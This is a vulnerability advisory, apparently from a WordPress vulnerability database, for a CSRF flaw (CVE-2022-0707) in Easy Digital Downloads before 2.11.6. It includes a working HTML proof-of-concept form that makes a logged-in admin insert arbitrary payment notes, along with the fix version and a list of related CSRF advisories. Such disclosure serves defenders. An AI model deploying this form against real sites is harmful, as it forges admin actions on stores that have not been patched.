Easy Digital Downloads < 2.11.6 – Arbitrary Payment Note Insertion via CSRF | CVE 2022-0707 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when inserting payment notes, which could allow attackers to make a logged admin insert arbitrary notes via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="http://wp.lab/wordpress/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="edd_insert_payment_note" />
      <input type="hidden" name="payment_id" value="{id_payment}" />
      <input type="hidden" name="note" value="GOTINJECTED" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

easy-digital-downloads

Fixed in 2.11.6

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2697388

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

muhamad hidayat

Submitter

muhamad hidayat

Submitter website

https://muh-hidayat7799.medium.com/

Submitter twitter

Verified

Yes

WPVDB ID

50680797-61e4-4737-898f-e5b394d89117

Timeline

Publicly Published

2022-03-28 (about 2 years ago)

Added

2022-03-28 (about 2 years ago)

Last Updated

2022-04-09 (about 2 years ago)

Other

Published

Title

Published

2024-04-19

Title

WordPress Automatic Plugin < 3.93.0 Cross-Site Request Forgery

Published

2023-12-06

Title

WPPerformanceTester <= 2.0.0 - Cross-Site Request Forgery

Published

2023-09-04

Title

Live News < 1.07 - Settings Update via CSRF

Published

2023-03-08

Title

CformsII <15.0.4 - Settings Update via CSRF

Published

2023-10-16

Title

Stout Google Calendar <= 1.2.3 - Arbitrary Settings Update via CSRF